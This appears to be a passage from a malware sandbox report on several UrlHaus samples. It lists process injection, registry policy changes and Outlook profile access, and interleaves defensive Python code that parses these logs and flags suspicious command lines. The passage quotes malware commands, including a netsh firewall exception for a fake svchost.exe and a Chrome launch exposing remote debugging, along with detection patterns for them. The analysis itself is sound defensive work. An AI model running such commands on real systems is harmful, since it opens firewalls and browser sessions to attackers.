N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3948 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3948 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3808 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3976 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 1864 wrote to memory of 3140 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 3912 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 3912 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Windows\System32\notepad.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 932 wrote to memory of 3184 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3912 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3184 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\SysWOW64\netsh.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 3912 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe
PID 2964 wrote to memory of 2608 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2964 wrote to memory of 2608 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2608 wrote to memory of 1572 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
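The table above is flat, so the execution tree it encodes has to be rebuilt by hand. The following Python is an added example (not part of the sandbox report) that parses rows of this shape, counts writes per parent/child pair, prints the tree rooted at take3.exe, and flags the pattern that distinguishes ordinary process creation from injection: gvndxfghs.exe writing nine times into three fresh copies of its own image is the RunPE / process-hollowing shape, whereas the two or three writes take3.exe makes into each dropped child are what CreateProcess itself does (command line, environment block). The sample rows are a constructed subset of the table, and the write-count threshold is an assumed heuristic, not a documented limit.

```python
import re
from collections import Counter, defaultdict

# Row shape in the "Suspicious use of WriteProcessMemory" table:
#   PID <src> wrote to memory of <dst> N/A <src image> <dst image>
WPM_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>[A-Za-z]:\\.*?) (?P<dst_img>[A-Za-z]:\\.*)$"
)

def parse_edges(rows):
    """Count writes per (writer pid, target pid) and remember each pid's image."""
    edges, images = Counter(), {}
    for line in rows:
        m = WPM_RE.match(line.strip())
        if not m:
            continue
        s, d = int(m["src"]), int(m["dst"])
        edges[(s, d)] += 1
        images.setdefault(s, m["src_img"])
        images.setdefault(d, m["dst_img"])
    return edges, images

def build_tree(edges):
    """children[pid] in first-seen order, plus the pids nobody wrote into (roots)."""
    children = defaultdict(list)
    for s, d in edges:
        if d not in children[s]:
            children[s].append(d)
    roots = sorted({s for s, _ in edges} - {d for _, d in edges})
    return children, roots

def lineage(edges, images, pid):
    """Image names from the root down to pid, following each pid's first writer."""
    parents = {}
    for s, d in edges:
        parents.setdefault(d, s)
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return [images[p].rsplit("\\", 1)[-1] for p in reversed(chain)]

def render(edges, images):
    """Indented tree lines of the form 'name (pid N, M writes)'."""
    children, roots = build_tree(edges)
    out = []
    def walk(pid, depth, writes):
        name = images[pid].rsplit("\\", 1)[-1]
        tail = f", {writes} writes" if writes else ""
        out.append(f"{'  ' * depth}{name} (pid {pid}{tail})")
        for c in children.get(pid, []):
            walk(c, depth + 1, edges[(pid, c)])
    for r in roots:
        walk(r, 0, 0)
    return out

def flag_self_injection(edges, images, threshold=4):
    """Parent writing repeatedly into a fresh process that runs its own image:
    the RunPE / process-hollowing pattern. CreateProcess alone accounts for
    two or three writes (command line, environment), so those stay below the
    threshold. The threshold is an assumed heuristic."""
    return sorted((s, d) for (s, d), n in edges.items()
                  if n >= threshold and images[s].lower() == images[d].lower())

# Constructed subset of the report's rows (counts match the table above).
T = r"C:\Users\Admin\AppData\Local\Temp\take3.exe"
G = r"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"
D = r"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
S = r"C:\Users\Admin\AppData\Roaming\svchost.exe"
N = r"C:\Windows\SysWOW64\netsh.exe"
TPB = r"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
CH = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

def row(src, dst, src_img, dst_img):
    return f"PID {src} wrote to memory of {dst} N/A {src_img} {dst_img}"

SAMPLE_ROWS = (
    [row(3948, 3912, T, T)] * 2 + [row(3912, 932, T, D)] * 3
    + [row(3912, 1864, T, G)] * 3 + [row(1864, 3808, G, G)] * 9
    + [row(1864, 3976, G, G)] * 9 + [row(932, 3184, D, S)] * 3
    + [row(3912, 2964, T, TPB)] * 3 + [row(3184, 2460, S, N)] * 3
    + [row(2964, 2608, TPB, CH)] * 2 + [row(2608, 1572, CH, CH)]
)

if __name__ == "__main__":
    edges, images = parse_edges(SAMPLE_ROWS)
    print("\n".join(render(edges, images)))
    print("self-injection:", flag_self_injection(edges, images))
```

The chain printed for pid 2460 (take3.exe > take3.exe > dsd.exe > svchost.exe > netsh.exe) is the one that ends in the firewall change listed under Processes; the chrome.exe child of TPB-1.exe is the remote-debugging launch.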

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
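Several of the registry tables above ("Enumerates system info in registry", "Modifies Internet Explorer settings", "Modifies data under HKEY_USERS" and this "System policy modification" table) share one row format, and the same handful of rules turn them into findings. The Python below is an added example, not part of the sandbox report: it parses rows in that format and applies rules for the BIOS identity reads (with the caveat that Chrome and Edge read SystemManufacturer/SystemProductName/SystemSKU for crash and metrics reporting, so a browser reading them is expected and only a non-browser reader is worth a medium score), for the two Policies\System values SeetrolClient sets, for the Ammyy Admin configuration keys, and for the ActiveX kill bit (0x400 in Compatibility Flags) that PCclear_Eng_mini.exe sets. The sample rows are copied from this page except for one invented row in which take3.exe itself reads SystemManufacturer; the rule set and severities are the author's assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One row of a signature table as printed on this page:
#   <Description> <Indicator> <Process> <Target>
# The process column always starts with a drive letter and the target column
# of a registry event is N/A, which is enough to split the row reliably.
ROW_RE = re.compile(
    r"^(?P<desc>Key opened|Key created|Key value queried|Set value \((?:int|str|data)\)) "
    r"(?P<ind>.*?) (?P<proc>[A-Za-z]:\\.*?) N/A$"
)

@dataclass
class RegEvent:
    desc: str
    key: str                # registry path, value name included where present
    value: Optional[str]    # data written by a "Set value" row, else None
    process: str

def parse_row(line: str) -> Optional[RegEvent]:
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    key, value = m["ind"], None
    if m["desc"].startswith("Set value") and " = " in key:
        key, _, raw = key.partition(" = ")
        value = raw.strip('"')
    return RegEvent(m["desc"], key, value, m["proc"])

# BIOS identity values read to recognise a VM or sandbox. Browsers read the
# same values for crash and metrics reporting, so the reader matters.
BIOS_FINGERPRINT = re.compile(
    r"\\HARDWARE\\DESCRIPTION\\System\\BIOS\\"
    r"(SystemManufacturer|SystemProductName|SystemSKU|SystemFamily|BIOSVendor|BIOSVersion)$",
    re.I)
BROWSERS = ("\\chrome.exe", "\\msedge.exe")
# Policies\System values that only remote-control software has a reason to set:
# SoftwareSASGeneration=1 lets a service synthesise Ctrl+Alt+Del and
# EnableLinkedConnections=1 shares mapped drives across the UAC split token.
POLICY_SYSTEM = re.compile(
    r"\\Policies\\System\\(SoftwareSASGeneration|EnableLinkedConnections)$", re.I)
AMMYY = re.compile(r"\\Software\\Ammyy\\Admin", re.I)
# Bit 0x400 of "Compatibility Flags" is the ActiveX kill bit for that CLSID.
KILLBIT = re.compile(
    r"\\Internet Explorer\\ActiveX Compatibility\\\{[0-9A-F-]+\}\\Compatibility Flags$", re.I)

def triage(ev: RegEvent):
    """Return (severity, reason) for one registry event, or None if uninteresting."""
    proc = ev.process.lower()
    if BIOS_FINGERPRINT.search(ev.key):
        if proc.endswith(BROWSERS):
            return ("info", "BIOS identity read by a browser (expected telemetry)")
        return ("medium", "BIOS identity read (VM/sandbox fingerprinting)")
    m = POLICY_SYSTEM.search(ev.key)
    if m and ev.value == "1":
        return ("high", f"{m.group(1)} enabled under Policies\\System")
    if AMMYY.search(ev.key):
        return ("high", "Ammyy Admin configuration written")
    if KILLBIT.search(ev.key) and ev.value and ev.value.isdigit() and int(ev.value) & 0x400:
        return ("info", "ActiveX kill bit set")
    return None

def triage_rows(rows):
    """Parse every row and return (severity, image name, reason) for each hit."""
    hits = []
    for line in rows:
        ev = parse_row(line)
        verdict = triage(ev) if ev else None
        if verdict:
            hits.append((verdict[0], ev.process.rsplit("\\", 1)[-1], verdict[1]))
    return hits

# Constructed sample: rows copied from this report plus one invented row in
# which take3.exe itself reads SystemManufacturer (that row is not on the page).
SAMPLE_ROWS = [
    r"Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\take3.exe N/A",
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A',
    r"Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A",
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A',
    r"Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A",
]

if __name__ == "__main__":
    for sev, image, reason in triage_rows(SAMPLE_ROWS):
        print(f"{sev:6} {image:24} {reason}")
```

Only "Key value queried" rows carry a value name, so the "Key opened ...\BIOS" rows produce nothing; the TPM telemetry key chrome.exe creates is ordinary browser behaviour and is deliberately left unmatched.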

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
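Many of the signatures above ("Modifies Windows Firewall", "Uses browser remote debugging", "Ammyy Admin", "Sets file to hidden", "Scheduled Task/Job", "Opens file in notepad") are decided from command lines like the ones listed under Processes below. The Python that follows is an added example, not part of the sandbox report, of the same decisions written as a command-line classifier: it extracts the image path from a quoted or unquoted Windows command line, flags Windows-lookalike names running outside C:\Windows (the svchost.exe in AppData\Roaming, the SecurityHealthService.exe in Downloads), the `netsh firewall add allowedprogram` exception, a browser main process started with `--remote-debugging-port` (renderer children inherit the flag and are skipped), the Ammyy `-service -lunch` install, and what notepad.exe was asked to open, which for this sample is paste.ps1 rather than a ransom note. The lookalike-name list, the rule tags and the sample command lines (copied from this page) are the author's assumptions.

```python
import re
from pathlib import PureWindowsPath

# Names that mimic Windows components. The genuine ones live under
# %SystemRoot%, so a copy in a user-writable directory is masquerading
# (ATT&CK T1036.005). The list is an assumption and should be extended.
LOOKALIKE_NAMES = {"svchost.exe", "securityhealthservice.exe", "runtime broker.exe",
                   "windows security health host.exe", "registry.exe"}

def image_of(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]

def classify(cmdline: str):
    """Return a list of (tag, detail) findings for one command line."""
    findings = []
    img = PureWindowsPath(image_of(cmdline))
    name, lower = img.name.lower(), cmdline.lower()

    if name in LOOKALIKE_NAMES and not str(img).lower().startswith("c:\\windows\\"):
        findings.append(("masquerading", f"{img.name} from {img.parent}"))

    # Firewall exception for a dropped binary: the legacy 'netsh firewall'
    # syntax used on this page, and the current 'netsh advfirewall' form.
    m = (re.search(r'netsh\s+firewall\s+add\s+allowedprogram\s+"([^"]+)"', cmdline, re.I)
         or re.search(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*?program="?([^"\s]+)',
                      cmdline, re.I))
    if m:
        findings.append(("firewall_exception", m.group(1)))

    # A browser started with the DevTools protocol exposed lets any local
    # process drive it and read cookies and sessions. Renderer and utility
    # children inherit the flag, so only the main process (no --type=) counts.
    m = re.search(r"--remote-debugging-port=(\d+)", cmdline)
    if m and name in ("chrome.exe", "msedge.exe") and "--type=" not in lower:
        findings.append(("browser_remote_debugging", int(m.group(1))))

    # Ammyy Admin installing itself as a service ("-lunch" is Ammyy's own spelling).
    if name.startswith("aa_v") and re.search(r"-service\s+-lunch", lower):
        findings.append(("ammyy_service_install", str(img)))

    # Scheduled-task persistence and attrib-based hiding.
    if name == "schtasks.exe" and "/create" in lower:
        findings.append(("scheduled_task", cmdline))
    if name == "attrib.exe" and re.search(r"\s\+[hs]\b", cmdline, re.I):
        findings.append(("hidden_attribute", cmdline))

    # notepad.exe opening a file: keep the extension so a .ps1 is not
    # mistaken for a ransom note.
    m = re.search(r'notepad\.exe"?\s+"?([^"]+\.(\w+))"?\s*$', cmdline, re.I)
    if m:
        findings.append(("notepad_opened", m.group(2).lower()))
    return findings

def scan(cmdlines):
    """(image name, findings) for every command line that produced a finding."""
    out = []
    for c in cmdlines:
        f = classify(c)
        if f:
            out.append((PureWindowsPath(image_of(c)).name, f))
    return out

# Constructed sample: command lines copied from the Processes section.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\take3.exe"',
    r'"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"',
    r'"C:\Users\Admin\AppData\Roaming\svchost.exe"',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE',
    r'"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US',
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_CMDLINES):
        print(image, findings)
```

Run against the full Processes list, the rules also fire on SecurityHealthService.exe in Downloads, "Windows Security Health Host.exe" in Music and "Runtime Broker.exe" under AppData\Roaming\SubDir, which is the whole masquerading set this detonation produced.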

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

